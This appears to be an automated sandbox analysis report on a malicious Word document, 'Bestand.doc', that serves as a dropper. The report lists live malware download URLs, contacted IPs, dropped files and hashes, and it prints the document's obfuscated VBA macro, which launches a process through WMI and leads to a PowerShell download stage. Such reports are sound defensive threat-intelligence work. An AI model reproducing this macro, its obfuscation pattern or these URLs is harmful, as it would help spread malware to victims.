                      http://hangarlastik.com/cgi-bin/Ui4n/ | 100% | Avira URL Cloud | malware
                      https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/ | 100% | Avira URL Cloud | malware
                      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                      http://sarture.com/wp-includes/JD8/ | 100% | Avira URL Cloud | malware
                      http://sarture.com | 0% | Avira URL Cloud | safe
                      http://padreescapes.com/blog/0I/ | 0% | Avira URL Cloud | safe
                      http://www.%s.comPA | 0% | URL Reputation | safe
                      http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/ | 100% | Avira URL Cloud | malware
                      http://seo.udaipurkart.com | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      sarture.com | 173.255.195.246 | true | true | | unknown
                      hangarlastik.com | 89.252.164.58 | true | true | | unknown
                      seo.udaipurkart.com | 103.92.235.25 | true | true | | unknown
                      padreescapes.com | 66.153.205.191 | true | true | | unknown

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      http://hangarlastik.com/cgi-sys/suspendedpage.cgi | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
                      http://5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ | true | Avira URL Cloud: safe | unknown
                      http://hangarlastik.com/cgi-bin/Ui4n/ | true | Avira URL Cloud: malware | unknown
                      http://sarture.com/wp-includes/JD8/ | true | Avira URL Cloud: malware | unknown
                      http://padreescapes.com/blog/0I/ | true | Avira URL Cloud: safe | unknown
                      http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/ | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://www.windows.com/pctv. | rundll32.exe | false | | high
                      http://investor.msn.com | rundll32.exe | false | | high
                      http://www.msnbc.com/news/ticker.txt | rundll32.exe | false | | high
                      http://padreescapes.com | powershell.exe | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
                      http://hangarlastik.comp | powershell.exe | true | Avira URL Cloud: safe | unknown
                      http://hangarlastik.com | powershell.exe | true | Avira URL Cloud: safe | unknown
                      https://brettshawmagic.com/content/Y/ | powershell.exe | true | Avira URL Cloud: malware | unknown
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe | false | URL Reputation: safe | unknown
                      http://www.hotmail.com/oe | rundll32.exe | false | | high
                      http://www.piriform.com/cclea | powershell.exe | false | | high
                      https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/ | powershell.exe | true | Avira URL Cloud: malware | unknown
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe | false | | high
                      http://www.icra.org/vocabulary/. | rundll32.exe | false | URL Reputation: safe | unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, rundll32.exe | false | | high
                      http://investor.msn.com/ | rundll32.exe | false | | high
                      http://sarture.com | powershell.exe | true | Avira URL Cloud: safe | unknown
                      http://www.piriform.com/ccleaner | powershell.exe | false | | high
                                        http://www.%s.comPApowershell.exe, 00000005.00000002.2094377918.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096621734.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099765117.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2101892214.00000000027A0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        low
                                        http://seo.udaipurkart.compowershell.exe, 00000005.00000002.2098035314.0000000003B3A000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown

                                        Contacted IPs


                                        Public

                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        89.252.164.58 | unknown | Turkey | 51559 | NETINTERNETNetinternetBilisimTeknolojileriASTR | true
                                        173.255.195.246 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
                                        5.2.136.90 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true
                                        103.92.235.25 | unknown | India | 138251 | ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN | true
                                        66.153.205.191 | unknown | United States | 21565 | AS21565US | true

                                        General Information

                                        Joe Sandbox Version:31.0.0 Red Diamond
                                        Analysis ID:337085
                                        Start date:07.01.2021
                                        Start time:18:35:17
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 30s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:Bestand.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:21
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • GSI enabled (VBA)
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winDOC@34/8@4/5
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 93.4% (good quality ratio 89.9%)
                                        • Quality average: 74.9%
                                        • Quality standard deviation: 25.4%
                                        HCA Information:
                                        • Successful, ratio: 94%
                                        • Number of executed functions: 197
                                        • Number of non-executed functions: 91
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Found warning dialog
                                        • Click Ok
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        Time | Type | Description
                                        18:35:38 | API Interceptor | 1x Sleep call for process: msg.exe modified
                                        18:35:39 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                                        18:35:44 | API Interceptor | 965x Sleep call for process: rundll32.exe modified

                                        Joe Sandbox View / Context

                                        IPs


                                        Domains

                                        Match | Associated Sample Name / URL | Detection | Context
                                        hangarlastik.com | arc-NZY886292.doc | malicious | 89.252.164.58

                                        ASN


                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B0EF2ED-537D-406E-B057-1B1541B1D39D}.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        Malicious:false
                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):46
                                        Entropy (8bit):1.0424600748477153
                                        Encrypted:false
                                        Malicious:false
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bestand.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Fri Jan 8 01:35:35 2021, length=171008, window=hide
                                        Category:dropped
                                        Size (bytes):1994
                                        Entropy (8bit):4.5245071903649485
                                        Encrypted:false
                                        Malicious:false
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):59
                                        Entropy (8bit):4.18963336378096
                                        Encrypted:false
                                        Malicious:false
                                        Preview: [doc]..Bestand.LNK=0..Bestand.LNK=0..[doc]..Bestand.LNK=0..
                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.431160061181642
                                        Encrypted:false
                                        Malicious:false
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T34CJE67ZJGLFSV18T6Q.temp
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8016
                                        Entropy (8bit):3.5829617355044774
                                        Encrypted:false
                                        SSDEEP:96:chQCsMqbqvsqvJCwolz8hQCsMqbqvsEHyqvJCwor/zvlYkHyf8OzlUVrIu:cy+olz8yWHnor/zvWf8OgIu
                                        MD5:1A838ABB3A40279F383AB1C21E56F683
                                        SHA1:27A1DA6BA86FA744C3CC8F3D2FFFDBEC7CFFD703
                                        SHA-256:5A663A1A8212AA670A701C2822949796FCAAC0AADC313CCD72E8AB09820FD5F3
                                        SHA-512:9DD9559A026717565F7ABDCD3169DF241EC33534B04F2E0A59499833481648CEBE7DCC61ECD6AF3ED45CF04EB152F5F07DB211D253AC4EACB85A960AC62DAF8B
                                        Malicious:false
                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                        C:\Users\user\Desktop\~$estand.doc
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.431160061181642
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                        MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                        SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                        SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                        SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                        C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):199626
                                        Entropy (8bit):7.481670588286676
                                        Encrypted:false
                                        SSDEEP:3072:hwbpDnn9FRrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:hsl9FpaBYF0nVp2MJHybR8dS9
                                        MD5:1C6DB931E1A9E52F74433510909ED133
                                        SHA1:B8D72335A962827DD6DB2912ECF0FC6DC56AABD8
                                        SHA-256:A39809D9A9B1DA262E89F785721DB56192DE84327342F98463761F30E17B5A52
                                        SHA-512:95B77C343A49F7F95FC47D0B3C5D66A78EA6BF1DE61BBC2492EF741E026DC4FDEC39B9BB071F5FBD524D85324D3B3171A33513BD1DB914CD7EB7E6E38CF6B974
                                        Malicious:false
                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: didactic Intelligent system Incredible Wooden Sausages Developer Practical Plastic Cheese port Awesome Fresh Chicken Maine, Author: Kylian Paul, Template: Normal.dotm, Last Saved By: Clara Menard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 14:23:00 2021, Last Saved Time/Date: Tue Jan 5 14:24:00 2021, Number of Pages: 1, Number of Words: 2604, Number of Characters: 14849, Security: 8
                                        Entropy (8bit):6.692610588134994
                                        TrID:
                                        • Microsoft Word document (32009/1) 79.99%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                        File name:Bestand.doc
                                        File size:170140
                                        MD5:64553aae596a4b3177964c3bac7502eb
                                        SHA1:9cdaf9d3f8dc72d15055fb5ca20fc0dd79b438ff
                                        SHA256:05ec62e5c17cce0faee1f6e791180a7104de6a277f0a3981a65ad43286b5854f
                                        SHA512:2632df66c05351acc150776c8841adc20ab56105297e233b29982b4320f2ab9627bdc25bd6177c2d8fa9773da195d9fa5211779c5dfcea575cba96d813fbb8bd
                                        SSDEEP:3072:WIs9ufstRUUKSns8T00JSHUgteMJ8qMD7gYrIXJ:u9ufsfgIf0pL3XJ

                                        File Icon

                                        Icon Hash:e4eea2aaa4b4b4a4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "Bestand.doc"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Office Word
                                        Encrypted Document:False
                                        Contains Word Document Stream:True
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1252
                                        Title:
                                        Subject:didactic Intelligent system Incredible Wooden Sausages Developer Practical Plastic Cheese port Awesome Fresh Chicken Maine
                                        Author:Kylian Paul
                                        Keywords:
                                        Comments:
                                        Template:Normal.dotm
                                        Last Saved By:Clara Menard
                                        Revision Number:1
                                        Total Edit Time:0
                                        Create Time:2021-01-05 14:23:00
                                        Last Saved Time:2021-01-05 14:24:00
                                        Number of Pages:1
                                        Number of Words:2604
                                        Number of Characters:14849
                                        Creating Application:Microsoft Office Word
                                        Security:8

                                        Document Summary

                                        Document Code Page:-535
                                        Number of Lines:123
                                        Number of Paragraphs:34
                                        Thumbnail Scaling Desired:False
                                        Company:
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:917504

                                        Streams with VBA

                                        VBA File Name: A81c_pcot0t3c8, Stream Size: 17941
                                        General
                                        Stream Path:Macros/VBA/A81c_pcot0t3c8
                                        VBA File Name:A81c_pcot0t3c8
                                        Stream Size:17941

                                        VBA Code Keywords

                                        Keyword
                                        VBA Code
                                        Attribute VB_Name = "A81c_pcot0t3c8"
                                        Function Rvpv59xrvp7m2wb()
                                        On Error Resume Next
                                        Cju6d_0v951 = "Uvktlkqthymnm68w" + "Ti33bl29fw_53yu"
                                        sf4 = Xj1p0_yor4q8g + Teh9tkv0p83u4g.StoryRanges.Item(2 / 2) + Gdmbhv991jtvgzq
                                           GoTo eRxrHHEBB
                                        Dim TptSCH As Object
                                        Set UnVnjA = hlEyDCTAH
                                        Set TptSCH = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim eRxrHHEBB As Object
                                        Set eRxrHHEBB = TptSCH.CreateTextFile("MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU")
                                        eRxrHHEBB.WriteLine "HNkPCvHSVKIC"
                                        eRxrHHEBB.WriteLine "CColSRKUqE"
                                        eRxrHHEBB.WriteLine "txLTFDcUtlBJi"
                                        Set VNhJZVCB = eHrGyvyM
                                        eRxrHHEBB.Close
                                        Set TptSCH = Nothing
                                        Set IYUAEB = cVkLD
                                        Set eRxrHHEBB = Nothing
                                        eRxrHHEBB:
                                        t3s = "]anw[3" + "p]anw[3"
                                        Eyshwbjqie_zkc = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
                                           GoTo UaCEJEERD
                                        Dim bwdNxC As Object
                                        Set zubYHA = tIaWTAJA
                                        Set bwdNxC = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim UaCEJEERD As Object
                                        Set UaCEJEERD = bwdNxC.CreateTextFile("tNUBI:\bUxfKyODA\ZyrvC.WCgQpU")
                                        UaCEJEERD.WriteLine "TzymSNqRGdH"
                                        UaCEJEERD.WriteLine "NkEpBgFHAsWaxHT"
                                        UaCEJEERD.WriteLine "FCWeAwOsytUsCF"
                                        Set gnToaBcmF = PvcTcFOF
                                        UaCEJEERD.Close
                                        Set bwdNxC = Nothing
                                        Set tNngtUo = chutdOAFs
                                        Set UaCEJEERD = Nothing
                                        UaCEJEERD:
                                        Pmgv9nf28vkxhyvys = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
                                           GoTo uwCSCCEO
                                        Dim KTDSIL As Object
                                        Set deuxb = XhUYUbSBA
                                        Set KTDSIL = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim uwCSCCEO As Object
                                        Set uwCSCCEO = KTDSIL.CreateTextFile("VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC")
                                        uwCSCCEO.WriteLine "LhUxJGiLUCZp"
                                        uwCSCCEO.WriteLine "QkKSDHgSXaAA"
                                        uwCSCCEO.WriteLine "RmlAGEzIZqLPNdIDj"
                                        Set PuAVBFFM = pzqeBGIAH
                                        uwCSCCEO.Close
                                        Set KTDSIL = Nothing
                                        Set pGLWAAGJ = TbHJC
                                        Set uwCSCCEO = Nothing
                                        uwCSCCEO:
                                        Agz22fuzun5rgvbir = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
                                           GoTo NHymnJzG
                                        Dim TiWkS As Object
                                        Set PkQhSAw = eBvGf
                                        Set TiWkS = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim NHymnJzG As Object
                                        Set NHymnJzG = TiWkS.CreateTextFile("JhEjHJH:\heHcF\xIjwBCI.IWEODGR")
                                        NHymnJzG.WriteLine "QCgbCFzJiDJUEIHES"
                                        NHymnJzG.WriteLine "AfSXEBzJIIxvQmJC"
                                        NHymnJzG.WriteLine "zDOlFEIFBVWkPbIC"
                                        Set ImZpAHpaF = bYwGEijH
                                        NHymnJzG.Close
                                        Set TiWkS = Nothing
                                        Set UgnVAHcRD = uvgvJGfI
                                        Set NHymnJzG = Nothing
                                        NHymnJzG:
                                        C0g8w_98xxaqclw4 = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
                                           GoTo rfIxFdkBE
                                        Dim ZZzrG As Object
                                        Set ArkJEKEEH = rINmB
                                        Set ZZzrG = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim rfIxFdkBE As Object
                                        Set rfIxFdkBE = ZZzrG.CreateTextFile("HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB")
                                        rfIxFdkBE.WriteLine "xfhECJccxFyA"
                                        rfIxFdkBE.WriteLine "AdLOPbWTXOCCRm"
                                        rfIxFdkBE.WriteLine "cWptEtSbgvWCAD"
                                        Set ZEetCEyLC = iOplaUSwB
                                        rfIxFdkBE.Close
                                        Set ZZzrG = Nothing
                                        Set uSvkK = kUseBAG
                                        Set rfIxFdkBE = Nothing
                                        rfIxFdkBE:
                                        M8v1nootk49plci = Agz22fuzun5rgvbir + C0g8w_98xxaqclw4 + Pmgv9nf28vkxhyvys + t3s + Eyshwbjqie_zkc
                                           GoTo bcUFD
                                        Dim zetDIDBDI As Object
                                        Set eTBBLHXwx = qdDeFbDk
                                        Set zetDIDBDI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim bcUFD As Object
                                        Set bcUFD = zetDIDBDI.CreateTextFile("ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG")
                                        bcUFD.WriteLine "wOTiEDqNZtWN"
                                        bcUFD.WriteLine "xaOQJbzFVCXtJADD"
                                        bcUFD.WriteLine "ufltvttBnHJNx"
                                        Set vKdAbBHGq = UbNkCZ
                                        bcUFD.Close
                                        Set zetDIDBDI = Nothing
                                        Set NctjGT = fMPBmQ
                                        Set bcUFD = Nothing
                                        bcUFD:
                                        J_gncosnr4av4lr = Slz39ct0lz_ksnd(M8v1nootk49plci)
                                           GoTo TOXmCsgb
                                        Dim TjDNNFkVD As Object
                                        Set IfdcD = sbLwDeWJ
                                        Set TjDNNFkVD = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim TOXmCsgb As Object
                                        Set TOXmCsgb = TjDNNFkVD.CreateTextFile("JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY")
                                        TOXmCsgb.WriteLine "GqSFCtOyDYdfx"
                                        TOXmCsgb.WriteLine "QsixYFOXyEEAmh"
                                        TOXmCsgb.WriteLine "QxWCtMBxGzkkBAU"
                                        Set KFlvRoHB = JjBKEUXqH
                                        TOXmCsgb.Close
                                        Set TjDNNFkVD = Nothing
                                        Set WiXswI = GEopA
                                        Set TOXmCsgb = Nothing
                                        TOXmCsgb:
                                        Set Tp28g8vd8ptrsy = CreateObject(J_gncosnr4av4lr)
                                           GoTo yHxgEeJg
                                        Dim AUZLIjCLH As Object
                                        Set aCXYJWIHA = BuEcDJvc
                                        Set AUZLIjCLH = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim yHxgEeJg As Object
                                        Set yHxgEeJg = AUZLIjCLH.CreateTextFile("LPJPJFI:\CTzVF\dLRZEH.maUZE")
                                        yHxgEeJg.WriteLine "RMNuAAEfwmHGkp"
                                        yHxgEeJg.WriteLine "YfIwYFFntmmdDsPv"
                                        yHxgEeJg.WriteLine "nbBVBbrmTJhR"
                                        Set vsASGFtA = JkICEEJbA
                                        yHxgEeJg.Close
                                        Set AUZLIjCLH = Nothing
                                        Set VWiBw = hrqzdCF
                                        Set yHxgEeJg = Nothing
                                        yHxgEeJg:
                                        Ufvxqjlwai0p9fg8tc = Mid(sf4, (1 + 4), Len(sf4))
                                           GoTo ApdWADYGV
                                        Dim UjlQFBJj As Object
                                        Set cTUpB = SYgbDdCEH
                                        Set UjlQFBJj = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim ApdWADYGV As Object
                                        Set ApdWADYGV = UjlQFBJj.CreateTextFile("zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB")
                                        ApdWADYGV.WriteLine "JNHUAINVrwxEKEHD"
                                        ApdWADYGV.WriteLine "EXrpEHndyyG"
                                        ApdWADYGV.WriteLine "TwoNCIGurJPYA"
                                        Set AFnzJ = IuDSasFIm
                                        ApdWADYGV.Close
                                        Set UjlQFBJj = Nothing
                                        Set PzSZDA = LUJoKCCQ
                                        Set ApdWADYGV = Nothing
                                        ApdWADYGV:
                                           GoTo eLNGd
                                        Dim buKzFt As Object
                                        Set ryExIJiIc = xDUMl
                                        Set buKzFt = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim eLNGd As Object
                                        Set eLNGd = buKzFt.CreateTextFile("sucQc:\iYsaHyNC\NiIqHAH.mTesbI")
                                        eLNGd.WriteLine "GApbBIepzWxnI"
                                        eLNGd.WriteLine "lkkOeHeJHjmGONABFI"
                                        eLNGd.WriteLine "lSOfQyhpoF"
                                        Set dUEpTnTJX = TFPJDBSa
                                        eLNGd.Close
                                        Set buKzFt = Nothing
                                        Set NPOhCPGF = hKDFekFGF
                                        Set eLNGd = Nothing
                                        eLNGd:
                                        Tp28g8vd8ptrsy.Create Slz39ct0lz_ksnd(Ufvxqjlwai0p9fg8tc), L_4bpvggv2vokj75, Nakuayuxnnrg5
                                           GoTo hQCyFzF
                                        Dim msoKFIIMI As Object
                                        Set gJsfsb = IYlnG
                                        Set msoKFIIMI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim hQCyFzF As Object
                                        Set hQCyFzF = msoKFIIMI.CreateTextFile("SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF")
                                        hQCyFzF.WriteLine "ehJSnoaWvoCEfGL"
                                        hQCyFzF.WriteLine "uAYnHfspvFJ"
                                        hQCyFzF.WriteLine "GuEmEfvZLaJDIAX"
                                        Set ZQkkGq = nEFlbEa
                                        hQCyFzF.Close
                                        Set msoKFIIMI = Nothing
                                        Set kcuElHl = ClgfEDCg
                                        Set hQCyFzF = Nothing
                                        hQCyFzF:
                                           GoTo sPUjHbDB
                                        Dim FijxC As Object
                                        Set sewLMSSJg = UcUhFvH
                                        Set FijxC = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim sPUjHbDB As Object
                                        Set sPUjHbDB = FijxC.CreateTextFile("DNCEiIDxC:\EYevg\MFdKF.RmyPCLa")
                                        sPUjHbDB.WriteLine "jyJEJqDCTEnyIA"
                                        sPUjHbDB.WriteLine "pIHMJANYJmFIe"
                                        sPUjHbDB.WriteLine "tZZjtwJRCQcVAD"
                                        Set HjcgHbA = ncXeGEGfF
                                        sPUjHbDB.Close
                                        Set FijxC = Nothing
                                        Set KzJMOvqoA = kIALACE
                                        Set sPUjHbDB = Nothing
                                        sPUjHbDB:
                                        End Function
                                        Function Slz39ct0lz_ksnd(Oap3dn26wvi2z)
                                        On Error Resume Next
                                           GoTo fdLCFDmF
                                        Dim WqyIx As Object
                                        Set fqoDE = yKTqX
                                        Set WqyIx = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim fdLCFDmF As Object
                                        Set fdLCFDmF = WqyIx.CreateTextFile("ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB")
                                        fdLCFDmF.WriteLine "CljNpAVDuUTJuHv"
                                        fdLCFDmF.WriteLine "RVkNwtRXUzC"
                                        fdLCFDmF.WriteLine "DTeWBCeIuXcgIDGC"
                                        Set eDbUAXI = PdhtG
                                        fdLCFDmF.Close
                                        Set WqyIx = Nothing
                                        Set mbDbF = QAhNFQ
                                        Set fdLCFDmF = Nothing
                                        fdLCFDmF:
                                        X_3mj_vfdq5m9 = Oap3dn26wvi2z
                                           GoTo tfgmN
                                        Dim tNvqYU As Object
                                        Set GzGtFB = WOdrGBJG
                                        Set tNvqYU = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim tfgmN As Object
                                        Set tfgmN = tNvqYU.CreateTextFile("sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU")
                                        tfgmN.WriteLine "yfwQBHQfgeJbFJB"
                                        tfgmN.WriteLine "lObhAqBUYxXfy"
                                        tfgmN.WriteLine "RmgSBGJYhhoQDxVIT"
